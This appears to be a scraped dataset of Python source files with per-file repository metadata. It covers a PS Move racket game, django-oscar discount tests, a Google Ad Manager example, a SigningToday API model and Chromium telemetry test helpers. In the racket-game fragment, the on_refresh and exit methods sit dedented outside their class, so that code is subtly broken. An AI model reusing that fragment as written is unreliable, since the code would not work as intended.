      'hand': (0 if(hand == racket.Handedness.LEFT) else 1),
      'strength': strength
    })
############################ Racket Events ###################################
  def on_idle(self, controller, hand):
    # On idle, restore the player's chosen LED color and stop rumbling.
    # (An earlier comment said "white ball"; the code actually uses
    # self.color_choice.)
    controller.color = psmoveapi.RGB(*self.color_choice)
    controller.rumble = 0
  def on_backswing(self, controller, hand):
    # On a backswing, give the player light rumble feedback.
    controller.rumble = 0.33
  def on_swing(self, controller, hand, strength):
    # On a swing, rumble at full power and report the swing upstream.
    controller.rumble = 1.0
    # Send the swing
    self.sio_game_swing(hand, strength)
    print 'racket: Swing, %f' % strength
############################# Button Events ##################################
  def on_button(self, controller, buttons):
    '''
    Handle controller button presses: the PS button drives a local
    random simulation of server events (for testing without a server);
    the face buttons pick a color; MOVE confirms the choice.
    '''
    # Method to parse button presses
    # Temporary to cycle through animations
    # Pressing the PS button simulates an in-order server event
    if(psmoveapi.Button.PS in buttons):
      if(self.state == GameState.COLOR_WAIT):
        if(bool(random.randint(0, 1))):
          self.on_sio_init_color_reject()
        else:
          self.on_sio_init_color_confirm()
      elif(self.state == GameState.START_WAIT):
        self.on_sio_game_is_server()
      elif(self.state == GameState.GAMEPLAY):
        end_rally = False
        # ~3/4 chance of a hit, with a small chance of winning the
        # rally; otherwise a miss. Occasionally end the whole game.
        if(bool(random.randint(0, 3))):
          self.on_sio_game_hit_ball({'strength': 0.75})
          if(not bool(random.randint(0, 5))):
            self.on_sio_game_won_rally()
            end_rally = True
        else:
          self.on_sio_game_missed_ball()
          end_rally = True
        if(end_rally and not bool(random.randint(0, 5))):
          if(bool(random.randint(0, 1))):
            self.on_sio_game_over({'is_winner': False})
          else:
            self.on_sio_game_over({'is_winner': True})
      return
    # Color choosing logic
    if(self.state == GameState.COLOR_SELECTION):
      choices = (psmoveapi.Button.SQUARE, psmoveapi.Button.TRIANGLE,
                 psmoveapi.Button.CROSS, psmoveapi.Button.CIRCLE)
      # Cycle through button options
      for button in choices:
        if(button in buttons):
          self.color_choice = SIORacket.COLORS[button]
          controller.color = psmoveapi.RGB(*self.color_choice)
          return
      # Color confirmation logic
      if((self.color_choice is not None) and (psmoveapi.Button.MOVE in buttons)):
        self.sio_init_color_choice(self.color_choice)
        # Signal a transition to the next state
        self.state = GameState.COLOR_WAIT
        self.state_data = {
          'events': [
            (event.Event(SIORacket.COLOR_WAIT_TIME,
                         self.generic_flash(rumble_scale = 0.75,
                                            color_scale = 0.75)), None),
            (clear_event.ClearEvent(), None)
          ]
        }
######################### Housekeeping Events ################################
  def on_init(self, controller):
    '''Reset a newly connected controller to a clear LED and no rumble.'''
    # Method for initialization
    print 'psmove:', controller, 'connected!'
    # Set the controller to be blank
    controller.color = psmoveapi.RGB(*SIORacket.COLOR_CLEAR)
    controller.rumble = 0
  def on_leave(self, controller):
    '''Log a controller disconnect.'''
    # Method for when a controller is dropped
    print 'psmove:', controller, 'disconnected!'
def on_refresh(self, controller, swing_state):
    # Per-frame update.  Decides (a) which GameState to transition to once
    # the currently queued animation events finish and (b) whether swings
    # should be processed this frame.  Returns the swing-enable flag.
    # NOTE(review): `swing_state` is not read here — presumably consumed by
    # a subclass or caller; confirm before removing.
    next_state = None
    enable_swings = False
    # Do nothing special if we are in the color selection / confirmation
    # stage: keep whatever swing setting the instance currently holds.
    if(self.state == GameState.COLOR_SELECTION
            or self.state == GameState.COLOR_WAIT
            or self.state == GameState.START_WAIT):
        enable_swings = self.enable_swings
    else:
        # The following should allow swings and transition back to GAMEPLAY.
        if(self.state == GameState.SERVER
                or self.state == GameState.GAMEPLAY
                or self.state == GameState.HIT_BALL):
            next_state = GameState.GAMEPLAY
            enable_swings = True
        # These should also transition to GAMEPLAY, but without swings.
        elif(self.state == GameState.WON_RALLY
                or self.state == GameState.LOST_RALLY):
            next_state = GameState.GAMEPLAY
        # These should make the game end: back to color selection.
        elif(self.state == GameState.END_GAME_WIN
                or self.state == GameState.END_GAME_LOST):
            next_state = GameState.COLOR_SELECTION
            enable_swings = False
    # Work through pending animations queued in self.state_data['events'].
    if(self.state_data is not None):
        if('events' in self.state_data):
            events = self.state_data['events']
            # Remove the event queue once drained; only then commit the
            # state transition computed above.
            if(len(events) == 0):
                if(next_state is not None):
                    self.state = next_state
                del self.state_data['events']
            else:
                # Execute the event at the front of the queue.  A None color
                # in the queue entry means "use the player's chosen color".
                (event, color) = events[0]
                color = self.color_choice if(color is None) else color
                event.do(controller, color)
                if(event.done()):
                    events.pop(0)
        # Clean up the state data if no more exists.
        elif(len(self.state_data) == 0):
            self.state_data = None
    return enable_swings
def exit(self):
    # Clean-up method: closes the socket.io connection before shutdown.
    self.sio.disconnect()
| 30.880309
| 80
| 0.625531
|
4a02251f3b1a446fe525091aa32fbdfc5072b672
| 16,371
|
py
|
Python
|
tests/integration/offer/test_absolute_benefit.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/offer/test_absolute_benefit.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
tests/integration/offer/test_absolute_benefit.py
|
sainjusajan/django-oscar
|
466e8edc807be689b0a28c9e525c8323cc48b8e1
|
[
"BSD-3-Clause"
] | null | null | null |
from decimal import Decimal as D
from django.core.exceptions import ValidationError
from django.test import TestCase
import mock
from oscar.apps.offer import models
from oscar.apps.offer.utils import Applicator
from oscar.test.basket import add_product, add_products
from oscar.test import factories
class TestAnAbsoluteDiscountAppliedWithCountConditionOnDifferentRange(TestCase):
    """Absolute discount whose benefit range differs from the condition range.

    The condition requires 2 of one product; the benefit gives 3.00 off a
    *different* product's range.
    """

    def setUp(self):
        # Condition: basket must contain 2 of this product.
        self.condition_product = factories.ProductFactory()
        condition_range = factories.RangeFactory()
        condition_range.add_product(self.condition_product)
        self.condition = models.CountCondition.objects.create(
            range=condition_range,
            type=models.Condition.COUNT,
            value=2)
        # Benefit: 3.00 off products from a separate range.
        self.benefit_product = factories.ProductFactory()
        benefit_range = factories.RangeFactory()
        benefit_range.add_product(self.benefit_product)
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=benefit_range,
            type=models.Benefit.FIXED,
            value=D('3.00'))
        self.offer = models.ConditionalOffer(
            id=1, condition=self.condition, benefit=self.benefit)
        self.basket = factories.create_basket(empty=True)
        self.applicator = Applicator()

    def test_succcessful_application_consumes_correctly(self):
        # Exactly satisfying the condition should apply the offer once.
        add_product(self.basket, product=self.condition_product, quantity=2)
        add_product(self.basket, product=self.benefit_product, quantity=1)
        self.applicator.apply_offers(self.basket, [self.offer])
        discounts = self.basket.offer_applications.offer_discounts
        self.assertEqual(len(discounts), 1)
        self.assertEqual(discounts[0]['freq'], 1)

    def test_condition_is_consumed_correctly(self):
        # Testing an error case reported on the mailing list: extra condition
        # products must not let the offer apply more than once.
        add_product(self.basket, product=self.condition_product, quantity=3)
        add_product(self.basket, product=self.benefit_product, quantity=2)
        self.applicator.apply_offers(self.basket, [self.offer])
        discounts = self.basket.offer_applications.offer_discounts
        self.assertEqual(len(discounts), 1)
        self.assertEqual(discounts[0]['freq'], 1)
class TestAnAbsoluteDiscountAppliedWithCountCondition(TestCase):
    """Absolute discount (3.00 off) with a count condition over all products."""

    def setUp(self):
        range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.CountCondition.objects.create(
            range=range,
            type=models.Condition.COUNT,
            value=2)
        self.offer = mock.Mock()
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=range,
            type=models.Benefit.FIXED,
            value=D('3.00'))
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        # No items: nothing to discount.
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_matches_condition_with_one_line(self):
        add_product(self.basket, price=D('12.00'), quantity=2)
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
        # Check the discount is applied equally to each item in the line
        # (12.00 - 3.00/2 = 10.50 per unit).
        line = self.basket.all_lines()[0]
        prices = line.get_price_breakdown()
        self.assertEqual(1, len(prices))
        self.assertEqual(D('10.50'), prices[0][0])

    def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines(self):
        # Use a basket with 2 lines
        add_products(self.basket, [
            (D('12.00'), 1), (D('12.00'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertTrue(result.is_successful)
        self.assertFalse(result.is_final)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
        # Check the discount is applied equally to each line
        for line in self.basket.all_lines():
            self.assertEqual(D('1.50'), line.discount_value)

    def test_applies_correctly_to_basket_which_matches_condition_with_multiple_lines_and_lower_total_value(self):
        # Use a basket with 2 lines whose total (2.50) is below the benefit
        # value (3.00): the discount must be capped at the basket total.
        add_products(self.basket, [
            (D('1.00'), 1), (D('1.50'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertTrue(result.is_successful)
        self.assertFalse(result.is_final)
        self.assertEqual(D('2.50'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition(self):
        add_products(self.basket, [
            (D('12.00'), 2), (D('10.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(4, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition_with_smaller_prices_than_discount(self):
        add_products(self.basket, [
            (D('2.00'), 2), (D('4.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(4, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition_with_smaller_prices_than_discount_and_higher_prices_first(self):
        # BUG FIX: this test previously added products in the same low-price-
        # first order as the test above, making it an exact duplicate that
        # never exercised the "higher prices first" scenario its name claims.
        add_products(self.basket, [
            (D('4.00'), 2), (D('2.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(4, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscount(TestCase):
    """Rounding behaviour when an absolute discount is split across lines."""

    def setUp(self):
        range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.CountCondition.objects.create(
            range=range,
            type=models.Condition.COUNT,
            value=2)
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=range,
            type=models.Benefit.FIXED,
            value=D('4.00'))
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_when_discounts_need_rounding(self):
        # Split discount across 3 lines: 4.00 / 3 does not divide evenly.
        for price in [D('2.00'), D('2.00'), D('2.00')]:
            add_product(self.basket, price)
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('4.00'), result.discount)
        # Check the discount is applied equally to each line, with the
        # 0.01 rounding remainder pushed onto the last line.
        line_discounts = [line.discount_value for line in self.basket.all_lines()]
        self.assertEqual(len(line_discounts), 3)
        for i, v in enumerate([D('1.33'), D('1.33'), D('1.34')]):
            self.assertEqual(line_discounts[i], v)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithCountCondition(TestCase):
    """Absolute discount capped at max_affected_items=1, count condition."""

    def setUp(self):
        range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.CountCondition.objects.create(
            range=range,
            type=models.Condition.COUNT,
            value=2)
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=range,
            type=models.Benefit.FIXED,
            value=D('3.00'),
            max_affected_items=1)
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_matches_condition(self):
        add_product(self.basket, D('12.00'), 2)
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition(self):
        # Only the two condition items are consumed; the rest stay
        # undiscounted because of max_affected_items=1.
        add_products(self.basket, [(D('12.00'), 2), (D('10.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(2, self.basket.num_items_without_discount)

    def test_applies_correctly_to_basket_which_exceeds_condition_but_with_smaller_prices_than_discount(self):
        # The single affected item costs 1.00, so the discount is capped.
        add_products(self.basket, [(D('2.00'), 2), (D('1.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('1.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(2, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountAppliedWithValueCondition(TestCase):
    """Absolute discount (3.00 off) with a basket-value condition (10.00)."""

    def setUp(self):
        range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.ValueCondition.objects.create(
            range=range,
            type=models.Condition.VALUE,
            value=D('10.00'))
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=range,
            type=models.Benefit.FIXED,
            value=D('3.00'))
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('10.00'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(1, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('5.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
        # 3 x 4.00 = 12.00 > 10.00: all three items are needed to cover the
        # condition value, so all three carry discount.
        add_products(self.basket, [(D('4.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(3, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
        add_products(self.basket, [(D('5.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(3, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountWithMaxItemsSetAppliedWithValueCondition(TestCase):
    """Absolute discount capped at max_affected_items=1, value condition."""

    def setUp(self):
        range = models.Range.objects.create(
            name="All products", includes_all_products=True)
        self.condition = models.ValueCondition.objects.create(
            range=range,
            type=models.Condition.VALUE,
            value=D('10.00'))
        self.benefit = models.AbsoluteDiscountBenefit.objects.create(
            range=range,
            type=models.Benefit.FIXED,
            value=D('3.00'),
            max_affected_items=1)
        self.offer = mock.Mock()
        self.basket = factories.create_basket(empty=True)

    def test_applies_correctly_to_empty_basket(self):
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('0.00'), result.discount)
        self.assertEqual(0, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_single_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('10.00'), 1)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(1, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_matches_condition(self):
        add_products(self.basket, [(D('5.00'), 2)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition(self):
        add_products(self.basket, [(D('4.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(3, self.basket.num_items_with_discount)
        self.assertEqual(0, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_exceeds_condition_but_matches_boundary(self):
        # Only two of the 5.00 items are needed to reach 10.00; the third
        # stays undiscounted.
        add_products(self.basket, [(D('5.00'), 3)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('3.00'), result.discount)
        self.assertEqual(2, self.basket.num_items_with_discount)
        self.assertEqual(1, self.basket.num_items_without_discount)

    def test_applies_correctly_to_multi_item_basket_which_matches_condition_but_with_lower_prices_than_discount(self):
        # Five 2.00 items cover the 10.00 condition; the affected item costs
        # 2.00 so the discount is capped at 2.00.
        add_products(self.basket, [(D('2.00'), 6)])
        result = self.benefit.apply(self.basket, self.condition, self.offer)
        self.assertEqual(D('2.00'), result.discount)
        self.assertEqual(5, self.basket.num_items_with_discount)
        self.assertEqual(1, self.basket.num_items_without_discount)
class TestAnAbsoluteDiscountBenefit(TestCase):
    """Model-level validation rules for the absolute-discount benefit."""

    def test_requires_a_benefit_value(self):
        # A FIXED benefit with a range but no value must fail clean().
        product_range = models.Range.objects.create(
            name="", includes_all_products=True)
        benefit = models.Benefit(type=models.Benefit.FIXED, range=product_range)
        with self.assertRaises(ValidationError):
            benefit.clean()

    def test_requires_a_range(self):
        # A FIXED benefit with a value but no range must fail clean().
        benefit = models.Benefit(type=models.Benefit.FIXED, value=10)
        with self.assertRaises(ValidationError):
            benefit.clean()
| 46.774286
| 130
| 0.679311
|
4a0225e0e4601daeae03d70b8965443baca73be4
| 2,059
|
py
|
Python
|
examples/ad_manager/v202002/cms_metadata_service/get_all_cms_metadata_values.py
|
jasperan/googleads-python-lib
|
6add9a7cc6148e98ada8097586a8eb1b47b2a8fd
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202002/cms_metadata_service/get_all_cms_metadata_values.py
|
jasperan/googleads-python-lib
|
6add9a7cc6148e98ada8097586a8eb1b47b2a8fd
|
[
"Apache-2.0"
] | null | null | null |
examples/ad_manager/v202002/cms_metadata_service/get_all_cms_metadata_values.py
|
jasperan/googleads-python-lib
|
6add9a7cc6148e98ada8097586a8eb1b47b2a8fd
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all CmsMetadataValues."""
# Import appropriate modules from the client library.
from __future__ import print_function
from googleads import ad_manager
def main(client):
    """Page through and print every CmsMetadataValue on the network."""
    # Initialize appropriate service.
    cms_metadata_service = client.GetService(
        'CmsMetadataService', version='v202002')
    # Statement used to page through CmsMetadataValues in batches.
    statement = ad_manager.StatementBuilder(version='v202002')
    while True:
        response = cms_metadata_service.getCmsMetadataValuesByStatement(
            statement.ToStatement())
        # Stop once a page comes back empty (or without a results key).
        if not ('results' in response and len(response['results'])):
            break
        for cms_metadata_value in response['results']:
            # Print out some information for each value.
            print(('CMS metadata value with Id %d and name "%s", associated with '
                   'the CmsMetadataKey with id %d and name "%s", was found.\n') %
                  (cms_metadata_value['cmsMetadataValueId'],
                   cms_metadata_value['valueName'], cms_metadata_value['key']['id'],
                   cms_metadata_value['key']['name']))
        # Advance to the next page.
        statement.offset += statement.limit
    print('\nNumber of results found: %s' % response['totalResultSetSize'])
if __name__ == '__main__':
    # Initialize client object.  LoadFromStorage reads credentials from the
    # default googleads storage file — confirm the local googleads.yaml setup.
    ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
    main(ad_manager_client)
| 36.767857
| 80
| 0.721224
|
4a0226dee816f314e90de6a6bae95dbe4bf2ad0c
| 5,947
|
py
|
Python
|
signing_today_client/models/signature_status_changed_notification_document.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/models/signature_status_changed_notification_document.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
signing_today_client/models/signature_status_changed_notification_document.py
|
signingtoday/signingtoday-sdk-python
|
ed267279622fb59f2ad8fa289157fc9cdf9d8a5b
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Signing Today Web
*Signing Today* is the perfect Digital Signature Gateway. Whenever in Your workflow You need to add one or more Digital Signatures to Your document, *Signing Today* is the right choice. You prepare Your documents, *Signing Today* takes care of all the rest: send invitations (`signature tickets`) to signers, collects their signatures, send You back the signed document. Integrating *Signing Today* in Your existing applications is very easy. Just follow these API specifications and get inspired by the many examples presented hereafter. # noqa: E501
The version of the OpenAPI document: 2.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from signing_today_client.configuration import Configuration
class SignatureStatusChangedNotificationDocument(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    # OpenAPI type of each model attribute.
    openapi_types = {
        'display_name': 'str',
        'id': 'int',
        'order': 'int'
    }

    # Mapping from attribute name to its JSON key in the API payload.
    attribute_map = {
        'display_name': 'display_name',
        'id': 'id',
        'order': 'order'
    }

    def __init__(self, display_name=None, id=None, order=None, local_vars_configuration=None):  # noqa: E501
        """SignatureStatusChangedNotificationDocument - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration

        self._display_name = None
        self._id = None
        self._order = None
        self.discriminator = None

        # Assignments go through the property setters, which validate when
        # client_side_validation is enabled.
        self.display_name = display_name
        self.id = id
        self.order = order

    @property
    def display_name(self):
        """Gets the display_name of this SignatureStatusChangedNotificationDocument.  # noqa: E501


        :return: The display_name of this SignatureStatusChangedNotificationDocument.  # noqa: E501
        :rtype: str
        """
        return self._display_name

    @display_name.setter
    def display_name(self, display_name):
        """Sets the display_name of this SignatureStatusChangedNotificationDocument.


        :param display_name: The display_name of this SignatureStatusChangedNotificationDocument.  # noqa: E501
        :type: str
        """
        if self.local_vars_configuration.client_side_validation and display_name is None:  # noqa: E501
            raise ValueError("Invalid value for `display_name`, must not be `None`")  # noqa: E501

        self._display_name = display_name

    @property
    def id(self):
        """Gets the id of this SignatureStatusChangedNotificationDocument.  # noqa: E501


        :return: The id of this SignatureStatusChangedNotificationDocument.  # noqa: E501
        :rtype: int
        """
        return self._id

    @id.setter
    def id(self, id):
        """Sets the id of this SignatureStatusChangedNotificationDocument.


        :param id: The id of this SignatureStatusChangedNotificationDocument.  # noqa: E501
        :type: int
        """
        if self.local_vars_configuration.client_side_validation and id is None:  # noqa: E501
            raise ValueError("Invalid value for `id`, must not be `None`")  # noqa: E501

        self._id = id

    @property
    def order(self):
        """Gets the order of this SignatureStatusChangedNotificationDocument.  # noqa: E501


        :return: The order of this SignatureStatusChangedNotificationDocument.  # noqa: E501
        :rtype: int
        """
        return self._order

    @order.setter
    def order(self, order):
        """Sets the order of this SignatureStatusChangedNotificationDocument.


        :param order: The order of this SignatureStatusChangedNotificationDocument.  # noqa: E501
        :type: int
        """
        if self.local_vars_configuration.client_side_validation and order is None:  # noqa: E501
            raise ValueError("Invalid value for `order`, must not be `None`")  # noqa: E501

        self._order = order

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively serialize nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, SignatureStatusChangedNotificationDocument):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, SignatureStatusChangedNotificationDocument):
            return True

        return self.to_dict() != other.to_dict()
| 33.789773
| 557
| 0.633092
|
4a02279b35ad0ed3438abdea95231661ea353258
| 1,862
|
py
|
Python
|
tools/telemetry/telemetry/page/page_measurement_unittest_base.py
|
anirudhSK/chromium
|
a8f23c87e656ab9ba49de9ccccbc53f614cdcb41
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
tools/telemetry/telemetry/page/page_measurement_unittest_base.py
|
anirudhSK/chromium
|
a8f23c87e656ab9ba49de9ccccbc53f614cdcb41
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
tools/telemetry/telemetry/page/page_measurement_unittest_base.py
|
anirudhSK/chromium
|
a8f23c87e656ab9ba49de9ccccbc53f614cdcb41
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2015-04-17T13:19:09.000Z
|
2021-10-21T12:55:15.000Z
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.core import util
from telemetry.page import page_runner
from telemetry.page import page as page_module
from telemetry.page import page_set
from telemetry.page import test_expectations
from telemetry.unittest import options_for_unittests
class PageMeasurementUnitTestBase(unittest.TestCase):
    """unittest.TestCase-derived class to help in the construction of unit tests
    for a measurement."""

    def CreatePageSetFromFileInUnittestDataDir(self, test_filename):
        # Convenience wrapper: reference the test file via a file:// URL.
        return self.CreatePageSet('file://' + test_filename)

    def CreatePageSet(self, test_filename):
        """Builds a single-page PageSet rooted at the unittest data dir."""
        base_dir = util.GetUnittestDataDir()
        ps = page_set.PageSet(file_path=base_dir)
        page = page_module.Page(test_filename, ps, base_dir=base_dir)
        # Attach canned page actions that measurements commonly expect.
        setattr(page, 'smoothness', {'action': 'scroll'})
        setattr(page, 'repaint', {"action": "repaint_continuously", "seconds": 2})
        ps.pages.append(page)
        return ps

    def RunMeasurement(self, measurement, ps, expectations=None, options=None):
        """Runs a measurement against a pageset, returning the rows its outputs.

        Args:
          measurement: the measurement to run.
          ps: the PageSet to run against.
          expectations: optional TestExpectations; a fresh instance is created
              per call when omitted.
          options: optional browser options; defaults to the unittest copy.
        """
        # BUG FIX: `expectations` previously defaulted to
        # test_expectations.TestExpectations() evaluated once at class
        # definition time (mutable default argument), so a single instance
        # was silently shared across every call and test.
        if expectations is None:
            expectations = test_expectations.TestExpectations()
        if options is None:
            options = options_for_unittests.GetCopy()
        assert options
        # Merge the measurement's command-line defaults into options without
        # clobbering values that are already set.
        temp_parser = options.CreateParser()
        measurement.AddCommandLineOptions(temp_parser)
        defaults = temp_parser.get_default_values()
        for k, v in defaults.__dict__.items():
            if hasattr(options, k):
                continue
            setattr(options, k, v)
        measurement.CustomizeBrowserOptions(options)
        # Suppress all result output for unit-test runs.
        options.output_file = None
        options.output_format = 'none'
        options.output_trace_tag = None
        return page_runner.Run(measurement, ps, expectations, options)
| 37.24
| 80
| 0.749194
|
4a022a6319b9423c35a6989ab9a751215b2aaf76
| 854,077
|
py
|
Python
|
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
gizzmo25/pythoncode-tutorials
|
39a413fc1da232ad6de7e5f1e8955564dc65448e
|
[
"MIT"
] | null | null | null |
machine-learning/nlp/text-generator/data/python_code.py
|
